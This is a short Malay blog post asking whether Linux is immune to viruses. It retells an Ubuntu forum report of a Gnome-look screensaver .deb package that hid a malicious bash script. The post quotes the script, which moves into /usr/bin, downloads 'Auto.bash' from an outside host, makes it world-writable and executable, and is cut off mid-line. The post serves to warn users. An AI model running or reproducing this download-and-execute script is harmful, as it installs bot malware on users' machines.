Mesti Baca : Adakah linux masih 100% invisible dari virus?
Saya merupakan seorang pengguna ubuntu linux yang sebab awalnya beralih menggunakan ubuntu kerana masalah virus dan antivirus dalam sistem operasi windows. Namun apabila muncul persoalan ini, saya masih boleh menjamin bahawa sepanjang 3~4 tahun menggunakan ubuntu, saya tidak pernah berhadapan dengan apa-apa masalah virus dalam ubuntu. Tetapi disini saya ingin menarik perhatian pembaca tentang satu peristiwa berikut; Seorang pengguna ubuntu telah melaporkan satu perkara yang mengemparkan dalam forum ubuntu . Conorsulli mengatakan beliau telah muatturun satu fail DEB screensaver dari Gnome-look dan apabila dipasang, ia tidak menambahkan screensaver baru ke dalam list screensaver. Apabila diperiksa code package tersebut, beliau mendapati salah satu failnya mempunyai sesuatu yang mengejutkan kerana ia tertulis satu bash script seperti berikut; #!/bin/sh cd /usr/bin/ rm Auto.bash sleep 1 wget http://05748.t35.com/Bots/Auto.bash chmod 777 Auto.bash echo ----------------- cd /etc/...